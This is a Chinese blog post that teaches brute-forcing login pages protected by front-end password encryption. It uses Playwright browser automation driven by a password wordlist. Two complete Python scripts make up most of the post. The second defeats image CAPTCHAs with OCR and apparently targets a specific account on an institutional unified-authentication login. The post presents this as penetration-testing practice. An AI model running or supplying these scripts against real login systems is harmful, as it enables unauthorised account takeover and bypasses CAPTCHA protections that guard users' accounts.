<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"><title>使用playwright自动化撞库绕过前端加密 | 北轨的博客</title><meta name="author" content="北轨"><meta name="copyright" content="北轨"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="​		做渗透测试的时候经常会遇到登录界面对密码进行前端加密的方式，被加密后的密码我们无法直接使用爆破工具对账号密码进行暴力破解登录，一般来说这种情况有两种解决办法，一是在js文件中找到对应的加密算法，对加密数据进行逆向操作，对发包工具中的明文密码进行加密，从而进行暴力破解，二是我们使用python脚"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://www.beigui.xyz/2023/08/21/playwright/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  }
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '使用playwright自动化撞库绕过前端加密',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: false,
  postUpdate: '2023-08-21 19:34:41'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
    win.getCSS = (url,id = false) => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      if (id) link.id = id
      link.onerror = reject
      link.onload = link.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        link.onload = link.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(link)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="北轨的博客" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/20220510222240.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">34</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">16</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fa fa-heartbeat"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/20230821193415.png')"><nav id="nav"><span id="blog-info"><a href="/" title="北轨的博客"><span class="site-name">北轨的博客</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fa fa-heartbeat"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">使用playwright自动化撞库绕过前端加密</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2023-08-21T10:11:37.000Z" title="发表于 2023-08-21 18:11:37">2023-08-21</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2023-08-21T11:34:41.046Z" title="更新于 2023-08-21 19:34:41">2023-08-21</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">993</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>4分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="使用playwright自动化撞库绕过前端加密"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>​		做渗透测试的时候经常会遇到登录界面对密码进行前端加密的方式，被加密后的密码我们无法直接使用爆破工具对账号密码进行暴力破解登录，一般来说这种情况有两种解决办法，一是在js文件中找到对应的加密算法，对加密数据进行逆向操作，对发包工具中的明文密码进行加密，从而进行暴力破解，二是我们使用python脚本进行自动化处理从而模拟浏览器的正常请求，进行暴力破解，今天演示第二种方法，如何使用playwright模块编写python脚本绕过前端加密进行爆破操作。</p>
<p>​		这里我编写了两个版本，分别是无验证码版本与有验证码版本，用来应对两种不同环境。</p>
<p>​		playwrite支持录制脚本功能，当我们不知如何使用函数来进行模拟操作时，我们使用下面这条命令来对我们手动操作进行录制。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">playwright.exe codegen -o test2.py --target python  http://www.xxxx.com</span><br></pre></td></tr></table></figure>

<p>​		这条命令会调用playwright的默认浏览器打开我们命令中指定网站并弹出代码框，当我们点击浏览器时，代码框会记录下我们进行的操作，并以代码的形式呈现。这样在我们编写脚本时便可以清楚的知道，我们要进行的操作对应的是哪段函数。</p>
<p><img src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/image-20230821184003077.png" alt="image-20230821184003077"></p>
<p>在有验证码版本中，使用了ddddocr这个库，这个库在会调用高版本的pillow时报错，我们可以使用两种方法解决这个问题。</p>
<p>方案一，修改ddddocr的_init_.py文件，将其中的ANTIALIAS替换为新方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># image = image.resize((int(image.size[0] * (64 / image.size[1])), 64), Image.ANTIALIAS).convert(&#x27;L&#x27;)</span><br><span class="line">image = image.resize((int(image.size[0] * (64 / image.size[1])), 64), Image.LANCZOS).convert(&#x27;L&#x27;)</span><br></pre></td></tr></table></figure>

<p>方案二，降级Pillow的版本，比如使用9.5.0版本</p>
<p>先卸载，再重新安装</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip uninstall -y Pillow</span><br><span class="line">pip install Pillow==<span class="number">9.5</span><span class="number">.0</span></span><br></pre></td></tr></table></figure>

<p>两种方案都亲测可用。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#无验证码版本</span></span><br><span class="line"><span class="keyword">from</span> playwright.sync_api <span class="keyword">import</span> sync_playwright</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    url = <span class="string">&#x27;https://xxxxx.com&#x27;</span></span><br><span class="line">    usr= <span class="string">&quot;admin&quot;</span></span><br><span class="line">    pwd_list = <span class="built_in">open</span>(<span class="string">&quot;password.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">    response_url = <span class="string">&#x27;https://xxxxxxx.com&#x27;</span></span><br><span class="line">    <span class="keyword">with</span> sync_playwright() <span class="keyword">as</span> p:</span><br><span class="line">        <span class="keyword">with</span> p.chromium.launch(headless=<span class="literal">False</span>) <span class="keyword">as</span> browser:</span><br><span class="line">            <span class="keyword">with</span> browser.new_context(locale=<span class="string">&quot;zh-CN&quot;</span>) <span class="keyword">as</span> context:</span><br><span class="line">                page = context.new_page()</span><br><span class="line">                page.goto(url)</span><br><span class="line">                time.sleep(<span class="number">10</span>)</span><br><span class="line">                <span class="keyword">for</span> pwd <span class="keyword">in</span> pwd_list:</span><br><span class="line">                    <span class="keyword">def</span> <span class="title function_">on_response</span>(<span class="params">response</span>):</span><br><span class="line">                        response.finished()</span><br><span class="line">                        <span class="keyword">if</span> response.url == response_url <span class="keyword">and</span> response.request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">                            failure_keyword = <span class="string">&quot;用户不存在/密码错误&quot;</span></span><br><span class="line">                            <span class="keyword">if</span> failure_keyword <span class="keyword">not</span> <span class="keyword">in</span> response.text():</span><br><span class="line">                                <span class="built_in">print</span>(<span class="string">f&#x27;爆破成功，账户名为<span class="subst">&#123;usr&#125;</span>,密码为<span class="subst">&#123;pwd&#125;</span>&#x27;</span>)</span><br><span class="line">                    page.on(<span class="string">&#x27;response&#x27;</span>,on_response)</span><br><span class="line">                    time.sleep(<span class="number">1</span>)</span><br><span class="line">                    page.get_by_placeholder(<span class="string">&quot;账号&quot;</span>).fill(usr)</span><br><span class="line">                    page.get_by_placeholder(<span class="string">&quot;密码&quot;</span>).fill(pwd)</span><br><span class="line">                    page.once(<span class="string">&quot;dialog&quot;</span>,<span class="keyword">lambda</span> dialog:dialog.dismiss())</span><br><span class="line">                    page.get_by_role(<span class="string">&#x27;button&#x27;</span>,name=<span class="string">&#x27;登 录&#x27;</span>).click()</span><br><span class="line">                    page.wait_for_load_state()</span><br><span class="line">    pwd_list.close()                </span><br></pre></td></tr></table></figure>

<p>​	</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#有验证码版本</span></span><br><span class="line"><span class="keyword">from</span> playwright.sync_api <span class="keyword">import</span> sync_playwright</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> ddddocr</span><br><span class="line"><span class="keyword">import</span> datetime</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    ocr = ddddocr.DdddOcr(show_ad=<span class="literal">False</span>)</span><br><span class="line">    url = <span class="string">&#x27;http://xxxxxxx.com&#x27;</span></span><br><span class="line">    usr= <span class="string">&quot;22064229&quot;</span></span><br><span class="line">    pwd_list = <span class="built_in">open</span>(<span class="string">&quot;password.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">    response_url = <span class="string">&#x27;http://xxxxxxxx&#x27;</span></span><br><span class="line">    <span class="keyword">with</span> sync_playwright() <span class="keyword">as</span> p:</span><br><span class="line">        <span class="keyword">with</span> p.chromium.launch(headless=<span class="literal">False</span>) <span class="keyword">as</span> browser:</span><br><span class="line">            <span class="keyword">with</span> browser.new_context(locale=<span class="string">&quot;zh-CN&quot;</span>) <span class="keyword">as</span> context:</span><br><span class="line">                page = context.new_page()</span><br><span class="line">                page.goto(url)</span><br><span class="line">                time.sleep(<span class="number">10</span>)</span><br><span class="line">                <span class="keyword">for</span> pwd <span class="keyword">in</span> pwd_list:</span><br><span class="line">                    time.sleep(<span class="number">5</span>)</span><br><span class="line">                    page.get_by_placeholder(<span class="string">&quot;用户名&quot;</span>).fill(usr)</span><br><span class="line">                    page.get_by_placeholder(<span class="string">&quot;密码&quot;</span>).fill(pwd)</span><br><span class="line">                    filename = <span class="string">&#x27;code_img/&#x27;</span> + datetime.datetime.now().strftime(<span class="string">&#x27;%Y-%m-%d-%H-%M-%S-%f&#x27;</span>) + <span class="string">&#x27;.png&#x27;</span>   <span class="comment">#存放截图下的验证码用于识别</span></span><br><span class="line">                    page.get_by_role(<span class="string">&quot;img&quot;</span>, name=<span class="string">&quot;验证码&quot;</span>).screenshot(path=filename)</span><br><span class="line">                    <span class="keyword">with</span> <span class="built_in">open</span>(filename,<span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f :</span><br><span class="line">                        image = f.read()</span><br><span class="line">                    code = ocr.classification(image)</span><br><span class="line">                    page.get_by_role(<span class="string">&quot;textbox&quot;</span>, name=<span class="string">&quot;验证码&quot;</span>).fill(code)</span><br><span class="line">                    page.once(<span class="string">&quot;dialog&quot;</span>,<span class="keyword">lambda</span> dialog:dialog.dismiss())</span><br><span class="line">                    page.get_by_role(<span class="string">&quot;button&quot;</span>,name=<span class="string">&quot;登录&quot;</span>).click()</span><br><span class="line">                    page.wait_for_load_state()</span><br><span class="line">                    <span class="keyword">if</span> <span class="string">&quot;统一身份认证&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> page.title():</span><br><span class="line">                        <span class="built_in">print</span>(<span class="string">f&#x27;爆破成功，账户名为<span class="subst">&#123;usr&#125;</span>,密码为<span class="subst">&#123;pwd&#125;</span>&#x27;</span>)</span><br><span class="line">                                </span><br></pre></td></tr></table></figure>

<p>参考连接 ：<a target="_blank" rel="noopener" href="https://www.qingteng.cn/news/63abe9ed4ebc940032ce00e3.html">青藤云安全-【漫谈攻防】暴力破解进化史 (qingteng.cn)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/light2081/article/details/131517132">AttributeError: module ‘PIL.Image‘ has no attribute ‘ANTIALIAS‘_软件测试大叔的博客-CSDN博客</a></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="http://www.beigui.xyz">北轨</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://www.beigui.xyz/2023/08/21/playwright/">http://www.beigui.xyz/2023/08/21/playwright/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://www.beigui.xyz" target="_blank">北轨的博客</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/python/">python</a></div><div class="post_share"><div class="social-share" data-image="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/20230821193415.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏</div><div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="/img/wechat.jpg" target="_blank"><img class="post-qr-code-img" src="/img/wechat.jpg" alt="wechat"/></a><div class="post-qr-code-desc">wechat</div></li></ul></div></div><nav class="pagination-post" id="pagination"><div class="next-post pull-full"><a href="/2023/08/07/CVE-2021-44228/" title="log4j2漏洞复现(CVE-2021-44228)"><img class="cover" src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/image-20230807111635702.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">log4j2漏洞复现(CVE-2021-44228)</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/20220510222240.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">北轨</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">34</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">16</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/bei-gui"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/bei-gui" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:1769606485@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="http://wpa.qq.com/msgrd?v=3&amp;uin=1769606485&amp;site=qq&amp;menu=yes" target="_blank" title="QQ"><i class="fab fa-qq"></i></a><a class="social-icon" href="https://space.bilibili.com/479406079" target="_blank" title="网易云"><i class="fab fa-bilibili"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">欢迎来到我的博客，一个记录生活小天地</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2023/08/21/playwright/" title="使用playwright自动化撞库绕过前端加密"><img src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/20230821193415.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="使用playwright自动化撞库绕过前端加密"/></a><div class="content"><a class="title" href="/2023/08/21/playwright/" title="使用playwright自动化撞库绕过前端加密">使用playwright自动化撞库绕过前端加密</a><time datetime="2023-08-21T10:11:37.000Z" title="发表于 2023-08-21 18:11:37">2023-08-21</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/08/07/CVE-2021-44228/" title="log4j2漏洞复现(CVE-2021-44228)"><img src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/image-20230807111635702.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="log4j2漏洞复现(CVE-2021-44228)"/></a><div class="content"><a class="title" href="/2023/08/07/CVE-2021-44228/" title="log4j2漏洞复现(CVE-2021-44228)">log4j2漏洞复现(CVE-2021-44228)</a><time datetime="2023-08-07T02:55:58.000Z" title="发表于 2023-08-07 10:55:58">2023-08-07</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/09/13/gongkongliuliang/" title="工控流量分析"><img src="https://dogefs.s3.ladydaily.com/~/source/wallhaven/full/y8/wallhaven-y8lqo7.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工控流量分析"/></a><div class="content"><a class="title" href="/2022/09/13/gongkongliuliang/" title="工控流量分析">工控流量分析</a><time datetime="2022-09-13T10:09:10.000Z" title="发表于 2022-09-13 18:09:10">2022-09-13</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/08/24/neiwangshentou1/" title="通过sql注入拿下内网(封神台)"><img src="https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="通过sql注入拿下内网(封神台)"/></a><div class="content"><a class="title" href="/2022/08/24/neiwangshentou1/" title="通过sql注入拿下内网(封神台)">通过sql注入拿下内网(封神台)</a><time datetime="2022-08-24T13:24:11.000Z" title="发表于 2022-08-24 21:24:11">2022-08-24</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/08/02/qwb_wp/" title="两道强网杯web题解"><img src="https://blog-1302407307.cos.ap-nanjing.myqcloud.com/image/20220802153926.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="两道强网杯web题解"/></a><div class="content"><a class="title" href="/2022/08/02/qwb_wp/" title="两道强网杯web题解">两道强网杯web题解</a><time datetime="2022-08-02T06:30:58.000Z" title="发表于 2022-08-02 14:30:58">2022-08-02</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('https://s2.loli.net/2022/05/10/BGYIv4eOVU9SMF5.jpg')"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By 北轨</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-nest.min.js"></script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>